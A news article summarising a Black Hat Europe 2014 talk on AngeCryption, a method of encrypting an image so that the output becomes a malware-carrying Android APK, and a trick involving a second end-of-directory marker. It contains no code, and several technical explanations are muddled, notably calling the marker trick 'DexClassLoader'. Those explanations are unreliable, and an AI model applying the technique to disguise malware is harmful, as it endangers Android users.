One of the interesting topics, presented on the Black Hat Europe Conference 2014 conducted in Amsterdam, The Netherlands, between 14 – 17 October this year was how hackers could get around Android package (APK) protection changing the input and output code of files send between devices with a few restrictions on the file formats only.
The idea was presented by Axelle Apvrille, Senior Antivirus Analyst and Researcher at Fortinet – a network security company and Ange Albertini, a reverse engineer, author of Corkami. Albertini has developed a technique called AngeCryption which can actually change the encryption of input and output files thus providing the second with malware. The technique is implemented as a Python script which is available for download on Google Code.
How AngeCryption works?
What the two researchers did is applying a specific key, using AES (Advanced Encryption Standard) in CBC (Cipher Block Chaining) mode to an input file so it produces a desired output file. During the demonstration on the Black Hat conference they used a PNG image of the Star Wars character Anakin Skywalker as an input file, applied AngeCryprion into its encryption, and produced a Darth Vader application looking as an image as well but containing malware. The whole idea is presented into the two researchers’ Proof of Concept application released after the conference and they have proved it works on all current Android platforms, thus making all users vulnerable to hack attacks.
The DexClassLoader Method
In order the application to install successfully on a device and to go unnoticed by the users some data needs to be added to the end of the encryption of the output file as well. During their demonstration in Amsterdam Apriville and Albertini showed that when the application tries to install the encrypted APK file onto a device Android actually displays a permission request. They also came up with a way of how this could be avoided though. A file usually ends with a marker called End of Central Directory (EOCD). Adding one more marker like this after the original one misleads Android to accept the file as a valid without requesting installation. The method is called DexClassLoader.
Android security team have been warned about the malware and are working on a fix. Although the operation system updates are much more secure these days than two or three years ago, the application works with the system’s newest version – Android 4.4.2 – and many users might still be vulnerable to it for the next couple of years, Albertini thinks.